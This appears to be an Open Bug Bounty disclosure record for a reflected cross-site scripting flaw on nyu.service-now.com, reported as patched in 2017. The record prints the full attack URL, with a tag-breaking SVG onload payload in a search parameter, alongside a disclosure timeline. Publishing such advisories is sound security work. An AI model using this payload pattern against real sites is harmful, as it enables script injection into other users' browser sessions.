nyu.service-now.com XSS vulnerability

2017-10-13T14:46:00
ID OBB:337600
Type openbugbounty
Reporter TAHA
Modified 2017-11-19T06:01:00

Description

Vulnerable URL:
https://nyu.service-now.com/servicelink/search_results.do?sysparm_ck=911a6e39134ccf44b1a6f107d144b0f691d916cf7cbddc0ed0264c00d36928a153c7f106&sysparm;_search=&sysparm;_fa=&sysparm;_sp=&sysparm;_cat=&sysparm;_serv=&sysparm;_location=&sysparm;_role=%3C/script%20%22/*%27/*%3E%3Csvg%20*/;%20onload=alert(1)%20//%3E
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 13 October, 2017 14:46 GMT
Generic security notifications sent to website owner| 13 October, 2017 14:48 GMT
Notification sent to subscribers (without technical details)| 13 October, 2017 18:17 GMT
Vulnerability details disclosed by researcher| 18 November, 2017 13:45 GMT
Vulnerability patched by the website owner| 19 November, 2017 06:01 GMT